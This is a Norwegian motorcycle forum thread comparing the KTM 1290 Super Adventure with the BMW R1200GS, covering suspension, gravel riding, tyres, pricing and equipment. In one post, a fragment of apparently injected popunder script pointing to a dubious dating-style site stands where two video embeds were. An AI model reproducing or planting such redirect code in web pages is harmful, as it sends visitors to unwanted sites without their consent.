KTM 1290 Super Adventure - BMW R1200/1250GS utfordrer?

Forum for fulleffekt tung-MC
Svar
Brukeravatar
Flanker
Innlegg: 1530
Registrert: 19 apr 2013, 09:02
Motorsykkelen din: Triumph Tiger Explorer
Sted: Berger, Svelvik
Kontakt:

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av Flanker »

poulet_cavalier skrev:
ATWindsor skrev:<snip> Vurderer en BMW uansett, så kan jo høre med forhandleren om man kan ta seg en tur med en GS, bare for å prøve.
De er helt sikkert ikke vonde å be :prf
(om du er gammel nok da - det er vel 40-års grense på GS :P :p )
Neida, sa han på 38 :knegg

Brukeravatar
SuperMorten
Innlegg: 5292
Registrert: 03 mar 2012, 04:23
Motorsykkelen din: 2005 BMW R 1200 RT
Sted: Åsgårdstrand

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av SuperMorten »

I år skal jeg prøve 1200 GSA :knegg
[album]3061[/album] [album]3503[/album][album]4642[/album]

Never Ride Faster Than Your Angel Can Fly

Kjørelengde 2012 - 8500 km
Kjørelengde 2013 - 21449 km
Kjørelengde pr 20.6.2014 - 7259 km

Brukeravatar
poulet_cavalier
Innlegg: 1272
Registrert: 25 feb 2012, 21:55
Motorsykkelen din: R1200GS
Sted: Asker

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av poulet_cavalier »

SuperMorten skrev:I år skal jeg prøve 1200 GSA :knegg
:bb_p:
FLICKR: https://www.flickr.com/photos/132823894@N04/
Be silent, or say something better than silence
-Pythagoras

Brukeravatar
JohnnyTh
Innlegg: 3461
Registrert: 24 aug 2010, 13:20
Motorsykkelen din: BMW R1250GSA
Sted: Lista

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av JohnnyTh »

poulet_cavalier skrev:
JohnnyTh skrev:
ATWindsor skrev:
Flanker skrev:
ATWindsor skrev:Hvordan manifesterer dette med lengre fjæringsvei seg på en asfaltvei?
Det manifesterer seg primært ved at sykkelen takler normale norske bakveier (inkl. obligatoriske telehiv, hull og sprekker) bedre enn sykler med kortere fjæringsvei. Spør noen av HD-gutta som hang på bak meg over Imingfjell i sommer :P :p

Jeg kunne bare dra på, la sykkelen spise humpene og reise meg opp å stå for å strekke litt på beina ved behov... Andre i følget klagde på tempoet, og mente det var tett før både amalgam og gebiss ramlet ut av kjeften :knegg
Mulig HDer er litt annerledes, men med min "normale" sykkel, så opplever jeg det som fjæringsveien er lang nok til å unna småhull, humper og sprekker på normale veier ihvertfall. (man har aldri prøvd noen adventure-sykkel, så har ikke så mye erfaring med de, mulig jeg bare ikke "vet hva jeg går glipp av")
Jeg er nok i samme båt. Har aldri opplevd at jeg har for lite fjæringsvei på Norske veier. Ikke i utlandet heller for den saks skyld, veiene er jo tross alt som oftest mye dårligere i utlandet :mk
Siden jeg og har begrenset erfaring med ADV klassen så er det mulig jeg ikke vet hva jeg går glipp av.

Noen nevner god bakkeklaring på grusveier. Trenger man ekstra bakkeklaring på en grusvei? Kanskje noen som har litt annet forhold til grusvei enn jeg har. De grusveiene jeg kjører på er høvelig flate, men har jo sett bilder fra Russland og Afrika der grusveiene er av en helt annen kvalitet.
Jeg husker jeg kjørte grusveien mellom Skjervangen og Aurskog med TDM 900 - det gikk ikke fort og demperene bunnet flere ganger. Grusomt (no pun intended) men jeg kom da fram. Samme strekningen med GS var som en lek.
Har en mistanke om at når du sier at det ikke gikk fort så er det mye fortere enn jeg tør å kjøre på grusvei uansett. :prop: er nok ikke tøff nok til hard grusveikjøring :eh

Håper jeg får muligheten til å prøve en 1200gs i år og kjenne om de er så mye bedre på asfalt som mange sier. Forventningene er høye :yeyeye
Bikers do it all the time, why dont humans. -Jerremy Clarkson, Top Gear.

Brukeravatar
AJ
Administrator
Innlegg: 38173
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av AJ »

Fikk nettopp bekreftet at 1290 SA blir å se og til å "føle og ta på" på årets MC-Messe :yeyeye !
Hadde ikke ventet noe annet, men helt sikker var jeg ikke siden det ryktes at det kommer svært få eksemplarer til Norge i år.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
hakhap
Innlegg: 2598
Registrert: 14 sep 2012, 14:39
Motorsykkelen din: Aprilia Tuono V4 1100 RR
Sted: Buskerud

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av hakhap »

AJ skrev:Fikk nettopp bekreftet at 1290 SA blir å se og til å "føle og ta på" på årets MC-Messe :yeyeye !
Hadde ikke ventet noe annet, men helt sikker var jeg ikke siden det ryktes at det kommer svært få eksemplarer til Norge i år.

Det er nok KTM Nordic som har den til utstilling og ikke en Norsk forhandler, men kult å få ta på den :prf
" Tuono: Italian for Holy Crap this is Quick" - MCN
Youtube
Flickr
Instagram
Bilde

Brukeravatar
RuneMC
Innlegg: 4326
Registrert: 22 okt 2009, 22:29
Motorsykkelen din: '08 DL650A
Sted: Røyken

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av RuneMC »

Grus på asfalt er mye verre enn grus på grus - ad grusveier som det ble snakket om tidligere.
Grus på asfalt kan bli til et nesten friksjonsløst rulle-lag mellom dekket og asfalten. Grusen på grusveien ruller ikke, den skyver på resten av løsmassene og gjøre ventuelle sladder mer gradvise/kontrollerte. Mange grusveier har nesten ikke grus i hjulsporene og da er det nesten som asfalt så lenge du holder deg der.

Ellers er faktisk en ikke uvesentlig del av forskjellen på "street vs adv" hvilke dekk du velger. Sportsdekk uten særlig mønster vil ikke få noe tak nedover i grusen i motsetning til dekk med mer mønster som graver seg dypere og får tak.

Et annet fakta om grus på asfalt er at det er Vegvesenets underentreprenører som sprer den utover i 90% av tilfellene ](*,)
Four wheels move the body. Two wheels move the soul.
RuneMC's foto på Flickr
Kjørt 2015 26K, '14: 21K, '13: 25K, '12: 22K, '11: 14K, '10: 18K, '09: 7K NMCU#

Brukeravatar
poulet_cavalier
Innlegg: 1272
Registrert: 25 feb 2012, 21:55
Motorsykkelen din: R1200GS
Sted: Asker

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av poulet_cavalier »

AJ skrev:Fikk nettopp bekreftet at 1290 SA blir å se og til å "føle og ta på" på årets MC-Messe :yeyeye !
Hadde ikke ventet noe annet, men helt sikker var jeg ikke siden det ryktes at det kommer svært få eksemplarer til Norge i år.
Husk nå å la andre får slippe til også - det er flere av oss som vil prøvesitte :knegg
FLICKR: https://www.flickr.com/photos/132823894@N04/
Be silent, or say something better than silence
-Pythagoras

Brukeravatar
AJ
Administrator
Innlegg: 38173
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av AJ »

poulet_cavalier skrev:
AJ skrev:Fikk nettopp bekreftet at 1290 SA blir å se og til å "føle og ta på" på årets MC-Messe :yeyeye !
Hadde ikke ventet noe annet, men helt sikker var jeg ikke siden det ryktes at det kommer svært få eksemplarer til Norge i år.
Husk nå å la andre får slippe til også - det er flere av oss som vil prøvesitte :knegg
:knegg
Kan stille meg bakerst i køen jeg... :sorry
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

ATWindsor
Innlegg: 672
Registrert: 06 feb 2015, 17:33
Motorsykkelen din: BMW R1200R

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av ATWindsor »

RuneMC skrev:Grus på asfalt er mye verre enn grus på grus - ad grusveier som det ble snakket om tidligere.
Grus på asfalt kan bli til et nesten friksjonsløst rulle-lag mellom dekket og asfalten. Grusen på grusveien ruller ikke, den skyver på resten av løsmassene og gjøre ventuelle sladder mer gradvise/kontrollerte. Mange grusveier har nesten ikke grus i hjulsporene og da er det nesten som asfalt så lenge du holder deg der.

Ellers er faktisk en ikke uvesentlig del av forskjellen på "street vs adv" hvilke dekk du velger. Sportsdekk uten særlig mønster vil ikke få noe tak nedover i grusen i motsetning til dekk med mer mønster som graver seg dypere og får tak.

Et annet fakta om grus på asfalt er at det er Vegvesenets underentreprenører som sprer den utover i 90% av tilfellene ](*,)
Ja, var akkurat det jeg skulle til å kommentere, når det gjelder "grus på asfalt" osv så er vel dekkene antakelig det viktigste.

Brukeravatar
Snikendeugle
Innlegg: 3617
Registrert: 10 apr 2013, 19:32
Motorsykkelen din: MV Agusta F3 800 RC 2018
Sted: Oslo

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av Snikendeugle »

En av de bedre youtube sidene for MC materiale (syns jeg) har også testet 1290 SA:

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Personlig syns jeg den er aaaltfor stor (bred), så der går mye av lysten for min del, men den ser alikevel ikke så veldig dum ut.

1050 eller 1190 derimot er mer på vei i riktig retning:

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
MV Agusta F3 800 Reparto Corse 2018
Tidl.: KTM RC 390 2015, KTM Duke 690 2013

Brukeravatar
AJ
Administrator
Innlegg: 38173
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av AJ »

Høres tydelig at midtstøtta tar nedi... :sk?

Men dette bedret seg visst straks man satte forspenningen til fører + passasjer via keypad'en på venstre styreholke :-) :thumleft .
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
AJ
Administrator
Innlegg: 38173
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av AJ »

Da har KTM endelig fått oppdatert prisene på sine nettsider...:

http://www.ktm.com/no/travel/1290-super ... OJI047dkfw" onclick="window.open(this.href);return false;
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
poulet_cavalier
Innlegg: 1272
Registrert: 25 feb 2012, 21:55
Motorsykkelen din: R1200GS
Sted: Asker

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av poulet_cavalier »

AJ skrev:Da har KTM endelig fått oppdatert prisene på sine nettsider...:

http://www.ktm.com/no/travel/1290-super ... OJI047dkfw" onclick="window.open(this.href);return false;
og da er 50.000 obligatorisk ekstrautstyr ala BMW eller?
FLICKR: https://www.flickr.com/photos/132823894@N04/
Be silent, or say something better than silence
-Pythagoras

Brukeravatar
AJ
Administrator
Innlegg: 38173
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av AJ »

poulet_cavalier skrev:
AJ skrev:Da har KTM endelig fått oppdatert prisene på sine nettsider...:

http://www.ktm.com/no/travel/1290-super ... OJI047dkfw" onclick="window.open(this.href);return false;
og da er 50.000 obligatorisk ekstrautstyr ala BMW eller?
Tru'kke det, nei ;-) .

1290'en har det meste av utstyret som trengs som standard: varmeholker, varme i salen med egen av/på knapp for fører og egen ditto bryter for passasjer, cruisecontroll, programmerbar semi-active demping, justerbare førerfotpinner, justerbart styre, selvkansellerende blinklys, ride-by-wire, fire eller var det fem injection motorprogram, motorbeskyttelse/veltebøyler og... tja, tenker jeg stopper der... ;-)

Så jeg tror ikke jeg trenger å bruke 50K på ekstrautstyr, nei... ;-)
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Svar